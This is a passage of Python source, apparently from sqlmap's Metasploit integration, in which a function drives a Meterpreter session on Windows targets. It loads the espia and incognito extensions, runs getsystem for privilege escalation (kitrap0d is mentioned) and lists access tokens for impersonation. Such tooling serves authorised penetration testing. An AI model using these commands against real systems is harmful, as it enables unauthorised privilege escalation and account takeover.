(self, proc, metSess)
| 453 | self.execCmd(cmd, silent=True) |
| 454 | |
| 455 | def _loadMetExtensions(self, proc, metSess): |
| 456 | if not Backend.isOs(OS.WINDOWS): |
| 457 | return |
| 458 | |
| 459 | send_all(proc, "use espia\n") |
| 460 | send_all(proc, "use incognito\n") |
| 461 | |
| 462 | # This extension is loaded by default since Metasploit > 3.7: |
| 463 | # send_all(proc, "use priv\n") |
| 464 | |
| 465 | # This extension freezes the connection on 64-bit systems: |
| 466 | # send_all(proc, "use sniffer\n") |
| 467 | |
| 468 | send_all(proc, "sysinfo\n") |
| 469 | send_all(proc, "getuid\n") |
| 470 | |
| 471 | if conf.privEsc: |
| 472 | print() |
| 473 | |
| 474 | infoMsg = "trying to escalate privileges using Meterpreter " |
| 475 | infoMsg += "'getsystem' command which tries different " |
| 476 | infoMsg += "techniques, including kitrap0d" |
| 477 | logger.info(infoMsg) |
| 478 | |
| 479 | send_all(proc, "getsystem\n") |
| 480 | |
| 481 | infoMsg = "displaying the list of available Access Tokens. " |
| 482 | infoMsg += "Choose which user you want to impersonate by " |
| 483 | infoMsg += "using incognito's command 'impersonate_token' if " |
| 484 | infoMsg += "'getsystem' does not success to elevate privileges" |
| 485 | logger.info(infoMsg) |
| 486 | |
| 487 | send_all(proc, "list_tokens -u\n") |
| 488 | send_all(proc, "getuid\n") |
| 489 | |
| 490 | def _controlMsfCmd(self, proc, func): |
| 491 | initialized = False |
no test coverage detected